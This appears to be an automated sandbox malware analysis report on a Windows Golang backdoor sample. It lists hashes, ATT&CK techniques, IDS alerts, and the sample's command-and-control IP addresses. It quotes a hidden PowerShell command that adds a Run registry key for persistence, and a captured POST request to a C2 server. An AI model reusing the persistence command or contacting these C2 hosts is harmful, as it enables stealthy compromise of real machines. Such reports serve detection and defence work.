Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Stealing of Sensitive Information

Source: Yara match; File source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 7660, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 7660, type: MEMORYSTR
MITRE ATT&CK matrix, listed by tactic column (a number in parentheses is the count shown beside that technique in the report's matrix cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter (12); PowerShell (1); At; Cron; Launchd
Persistence: Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (311); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Login Hook; Network Logon Script
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (311); DLL Side-Loading (1); Software Packing
Credential Access: Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Input Capture (21); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Proxy (1); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label | Link
BwqqVoHR71.exe | 29% | ReversingLabs | |
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106/ | false | | unknown
http://46.8.236.61/ | false | | unknown
http://93.185.159.253/ | false | | unknown
http://188.130.206.243/ | false | | unknown
http://91.212.166.91/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://picsum.photos/208/500 | BwqqVoHR71.exe | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://46.8.232.106 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://188.130.206.243http://46.8.232.106 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x | BwqqVoHR71.exe | false | | unknown
http://188.130.206.243 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://93.185.159.253 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://46.8.236.61 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://91.212.166.91 | BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
93.185.159.253 | unknown | Russian Federation | 39912 | I3B-ASAT | false
91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-AS Etihad Etisalat Company Mobily SA | false
109.172.88.38 | unknown | Russian Federation | 41691 | SUMTEL-AS-RIPE Moscow Russia RU | true
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1537033
                                    Start date and time:2024-10-18 14:08:33 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
Number of new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:BwqqVoHR71.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:0a21a94198f6157abb36bf55cb43be27.exe
                                    Detection:MAL
                                    Classification:mal72.troj.evad.winEXE@7/4@0/6
                                    EGA Information:Failed
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BitLockerToGo.exe, PID 7660 because there are no executed functions
• Execution Graph export aborted for target BwqqVoHR71.exe, PID 8164 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 5908 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • VT rate limit hit for: BwqqVoHR71.exe
Time | Type | Description
14:09:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
14:10:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | GoogleInstaller.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | GoogleInstaller.exe | malicious | GO Backdoor | 46.8.232.106/
188.130.206.243 | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243/
93.185.159.253 | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | GoogleInstaller.exe | malicious | GO Backdoor | 93.185.159.253/
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | na.elf | malicious | Mirai, Moobot | 188.130.200.140
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | SecuriteInfo.com.Win32.PWSX-gen.31473.14481.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | NmN91TzzQT.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | mD9WPbCEgK.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | antispam_connect1.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | antispam_connect1.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-AS IP-transit operator in Russia Ukraine and Baltics | 2efOvyn28p.exe | malicious | Stealc, Vidar | 46.8.231.109
MOBILY-AS Etihad Etisalat Company Mobily SA | n5h5BaL8q0.exe | malicious | Sality, XWorm | 46.44.87.100
MOBILY-AS Etihad Etisalat Company Mobily SA | arm5.elf | malicious | Mirai | 37.243.118.61
MOBILY-AS Etihad Etisalat Company Mobily SA | arm6.elf | malicious | Unknown | 37.243.118.25
MOBILY-AS Etihad Etisalat Company Mobily SA | mips.elf | malicious | Mirai | 178.81.128.81
MOBILY-AS Etihad Etisalat Company Mobily SA | sparc.elf | malicious | Mirai | 178.81.128.55
MOBILY-AS Etihad Etisalat Company Mobily SA | m68k.elf | malicious | Unknown | 5.110.196.213
MOBILY-AS Etihad Etisalat Company Mobily SA | na.elf | malicious | Mirai | 5.108.208.202
MOBILY-AS Etihad Etisalat Company Mobily SA | na.elf | malicious | Mirai | 176.224.147.87
MOBILY-AS Etihad Etisalat Company Mobily SA | na.elf | malicious | Mirai | 178.81.128.75
I3B-ASAT | botnet.x86.elf | malicious | Mirai, Moobot | 78.142.85.12
I3B-ASAT | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | 3wtD2jXnxy.exe | malicious | RedLine, STRRAT | 93.185.156.125
I3B-ASAT | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1264
                                    Entropy (8bit):5.367050635458706
                                    Encrypted:false
                                    SSDEEP:24:3FnWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:pWSU4y4RQmFoUeUmfmZ9tlNWR8GT
                                    MD5:30EF126281FA5B79F89AD7367CAF1E35
                                    SHA1:26B14F428AD37A812F1134155A49E51F3830CBD4
                                    SHA-256:47BB6B31CBF6BAF6754C2A359485AC75BCF6C9FA427372CF62A02B6EE5306884
                                    SHA-512:1E84DE9A8B8285016D10992E4E030C9C9EE503975C01852C68B3121437491F529CE114FE63601171A12D9BE113243E9A4C01FBD2F8F6278BE975DBAF8CAEBDB4
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):416
                                    Entropy (8bit):6.290442194664285
                                    Encrypted:false
                                    SSDEEP:12:P2A1UGxFeTAyfgbIvl6EdwyX3g8v7RlCy+S0:Pv2GHe8yfMYlXQK7Rk40
                                    MD5:53F36EDE81D78D39A69ABBDBB454D634
                                    SHA1:D902E8664B0B9136EB667B91A773E721B8F48827
                                    SHA-256:B4F67571FD899C51249437FEAB69736B0D6C496412B2F2B9B3BA50ECC6F1C82B
                                    SHA-512:D6245D3F53E981CD67C07D8743830E49B895415F863B4CDF7174087047F242BEDC41BBE02A8F7378B9A7F499BF4F465ACBAC6DF25A76EBD841AD0A732F89222E
                                    Malicious:false
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.3085429709464504
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:BwqqVoHR71.exe
                                    File size:19'172'088 bytes
                                    MD5:0a21a94198f6157abb36bf55cb43be27
                                    SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
                                    SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
                                    SHA512:a09ed0c8e69a4f399b4c747d1b0565693caf64a0e7785ea55efd31819d638f3f84d626bdb7607dcf9338785a403f88b72c7566c532a56f2b6ded0d5c77d80fa1
                                    SSDEEP:196608:haiDgib6rJD1c/naBrlHmD0Aol3MM146sy3sjXsJrtTCZiL:p6D1UaVkDxQ4BmtZ
                                    TLSH:7917AE10FA9B40F1ED034971919BB26F63346E058B25CBDBEB957B2EFC376920876205
                                    Icon Hash:833961634951097f
                                    Entrypoint:0x471c40
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:1
                                    File Version Major:6
                                    File Version Minor:1
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:1
                                    Import Hash:4f2f006e2ecf7172ad368f8289dc96c1
                                    Signature Valid:false
                                    Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                    Signature Validation Error:A certificate was explicitly revoked by its issuer
                                    Error Number:-2146762484
                                    Not Before, Not After
                                    • 09/09/2024 05:06:13 09/09/2025 05:06:12
                                    Subject Chain
                                    • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                    Version:3
                                    Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                    Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                    Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                    Serial:332576FE101609502C23F70055B4A3BE
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x122d000 | 0x45e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1276000 | 0x1e0d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1246200 | 0x28f8 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122e000 | 0x46ac8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1166e00 | 0xb8 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4dc968 | 0x4dca00 | f482a2ef2cb5edb87b98c38afb691406 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4de000 | 0xc87c4c | 0xc87e00 | fb37f6883da54d37c8d09448d61f3fe6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1166000 | 0xc6ea0 | 0x7c000 | 7c710d50a908c7f6ab3014874330232b | False | 0.27440618699596775 | data | 5.963241990946737 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x122d000 | 0x45e | 0x600 | cd66f39cc4398db79c4b9999994e1d88 | False | 0.3626302083333333 | data | 4.068932523700792 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x122e000 | 0x46ac8 | 0x46c00 | 1516e6d890589227101e0ac3356c7e25 | False | 0.5061354350706714 | data | 6.6069875234777795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x1275000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x1276000 | 0x1e0d8 | 0x1e200 | db3853b5e9f878d7b090889cc5c58937 | False | 0.267083765560166 | data | 3.7343061086588305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x12762a4 | 0x4524 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9666101694915255
RT_ICON | 0x127a7c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.10524370046137466
RT_ICON | 0x128aff0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.1844000944733113
RT_ICON | 0x128f218 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.24180497925311203
RT_ICON | 0x12917c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.29338649155722324
RT_ICON | 0x1292868 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.3762295081967213
RT_ICON | 0x12931f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.44680851063829785
RT_GROUP_ICON | 0x1293658 | 0x68 | data | | | 0.7596153846153846
RT_VERSION | 0x12936c0 | 0x4b8 | COM executable for DOS | English | United States | 0.29387417218543044
RT_MANIFEST | 0x1293b78 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
                                    DLLImport
                                    kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T14:10:38.691574+0200 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 109.172.88.38 | 23961 | 192.168.2.10 | 49988 | TCP
2024-10-18T14:10:38.691903+0200 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.10 | 49988 | 109.172.88.38 | 23961 | TCP
2024-10-18T14:11:07.929703+0200 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.10 | 49988 | 109.172.88.38 | 23961 | TCP
2024-10-18T14:11:08.196218+0200 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 109.172.88.38 | 23961 | 192.168.2.10 | 49988 | TCP
• 46.8.232.106
• 46.8.236.61
• 93.185.159.253
• 91.212.166.91
• 188.130.206.243
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49865 | 46.8.232.106 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:09:58.824002028 CEST | 298 | OUT | POST / HTTP/1.1
Host: 46.8.232.106
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: oFbfsa5f
Accept-Encoding: gzip
